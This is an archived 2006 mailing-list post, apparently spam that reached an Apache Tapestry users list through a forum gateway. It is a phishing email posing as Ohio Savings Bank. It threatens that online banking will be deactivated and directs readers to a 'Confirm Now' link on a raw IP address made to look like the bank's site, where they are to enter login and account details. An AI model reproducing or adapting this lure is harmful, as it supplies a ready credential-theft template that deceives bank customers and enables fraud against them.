Posted to users@tapestry.apache.org by Apache <ap...@ss78.shared.server-system.net> on 2006/02/14 22:00:06 UTC

NOTICE: Bank By Net® e-statements and Online Bill Pay deactivation notice

   Dear Ohio Savings Bank Customer,

        Due to recent fraudulent activities on some of Ohio Savings Bank online
   accounts we are launching a new security system to make Ohio Savings Bank
   online accounts more secure and safe. Before we can activate it we will be checking
   all Ohio Savings Bank online accounts to confirm the authenticity of the holder.
   As the Primary Contact, you must confirm the service(s) listed below or it will be
   deactivated and deleted.

   SERVICE: Bank By Net® with Online Bill Pay
   EXPIRATION:  	Feb -  15 - 2006
   Confirm Now (http://218.98.192.240/.www.ohiosavings.com/login.htm) [/b]your 	Bank By Net® and Online Bill Pay services.

      -complete the required information to authenticate and reset your account

      -make sure your account balance has not been changed

      -make sure your details have not been changed

      -review recent transactions in your account history for any unauthorized transfer

   Thank you for using Bill Pay Service. We appreciate your  	business and the opportunity to serve you.
   If you find any type of suspicious activities please contact us immediately.
   Please include in your message your account number, your account name
   and the unauthorized transfer date & time.
    Please do not reply to this message. For any inquiries, contact Customer Service.

    Document Reference: (87051203).

   Copyright 1996  	- 2006 Ohio Savings Bank, Ohio Savings Plaza Copyright © 2006

Sent from www.TapestryForums.com

Read this topic online here: <<topic_link>>

http://www.tapestryforums.com/viewtopic.php?p=14419#14419